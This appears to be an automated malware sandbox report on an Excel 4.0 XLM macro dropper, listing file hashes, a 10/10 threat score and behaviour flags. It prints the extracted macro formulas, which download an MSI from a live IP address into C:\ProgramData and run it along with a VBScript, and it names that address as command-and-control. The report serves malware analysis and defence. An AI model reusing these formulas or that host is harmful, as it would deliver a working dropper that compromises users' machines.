General

  • Target

    37b63c24482584a370356b2099ef9842

  • Size

    6KB

  • Sample

    231222-at8xysfhhq

  • MD5

    37b63c24482584a370356b2099ef9842

  • SHA1

    cd519de919291b7027044f1134d95f361c76e02b

  • SHA256

    dfa04237fd2a1c9b8becb7cb34be76d6f82cf969d02773b0e27cfec53ddb9c4b

  • SHA512

    dac02127d9075f86a3ed43c18217e48902ef06c3fad60cdeb7b166004e35eddae8b1dac4515453fc8b5d21c979ddb82f93d4ab3e8a25b4aa8dcc8be63737e74e

  • SSDEEP

    192:NDS0uSw1aEOmmfRN8UhHFBFYuLb98yOTKs:N/uxwr1FYmb98yOOs

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187

Attributes
  • formulas

    =EXEC("msiexec.exe") =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187","C:\ProgramData\uluculus.msi",0,0) =EXEC("wscript C:\ProgramData\start.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187

Targets

    • Target

      37b63c24482584a370356b2099ef9842

    • Size

      6KB

    • MD5

      37b63c24482584a370356b2099ef9842

    • SHA1

      cd519de919291b7027044f1134d95f361c76e02b

    • SHA256

      dfa04237fd2a1c9b8becb7cb34be76d6f82cf969d02773b0e27cfec53ddb9c4b

    • SHA512

      dac02127d9075f86a3ed43c18217e48902ef06c3fad60cdeb7b166004e35eddae8b1dac4515453fc8b5d21c979ddb82f93d4ab3e8a25b4aa8dcc8be63737e74e

    • SSDEEP

      192:NDS0uSw1aEOmmfRN8UhHFBFYuLb98yOTKs:N/uxwr1FYmb98yOOs

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks